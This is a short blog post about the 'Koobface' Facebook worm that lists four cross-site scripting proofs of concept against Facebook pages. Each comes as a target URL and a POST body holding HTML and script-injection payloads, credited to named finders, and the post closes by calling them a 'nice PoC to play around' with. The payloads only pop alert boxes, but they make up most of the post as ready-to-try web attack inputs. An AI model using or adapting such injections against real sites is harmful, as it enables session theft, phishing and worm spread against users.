Home > Daily Thoughts, Emerging Threats > Critical Facebook XSS

Critical Facebook XSS

Facebook worm aka “Koobface” exploiting highly critical XSS vulnerability as recently discovered. It seems these guys successfully mess around in facebook as it has been around for months now. 

Further Reading xssed.com

XSS #1 with POST (by Zeitjak

http://www.new.facebook.com/r.php

POST: reg_email__=”onmouseover=”alert(‘XSS – ZJ’)”foo=”bar

XSS #2 with POST (by David Wharton

https://login.facebook.com/login.php?iphone&next=http%3A%2F%2Fiphone.facebook.com%2F

POST: 

email=biz%22%3E%3Cscript%3Ealert%28%27tohellwithgeorgia%27%29%3C%2Fscript%3E%3C%22&pass=greetz2evilghost&next=http%3A%2F%2Fiphone.facebook.com%2F&login=Login

XSS #3 (by DaiMon)

http://apps.facebook.com/blognetworks/searchpage.php?tag=%22%3E%3Cscript%3Ealert(%22DaiMon%22)%3C/script%3E

This one works on another IP (67.228.87.82) and can’t be used for a worm, except a phishing one.

XSS #4 with POST (by p3lo)

http://developers.facebook.com/tools.php?fbml

POST: 

profile=1299125444&position=wide&api_key=%27%22%3E%3C%2Ftitle%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS+by+p3lo%3C%2Fh1%3E%3C%2Fmarquee%3E+&fbml=

–>> Hmmm nice PoC to play around.

  1. No comments yet.
  1. No trackbacks yet.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: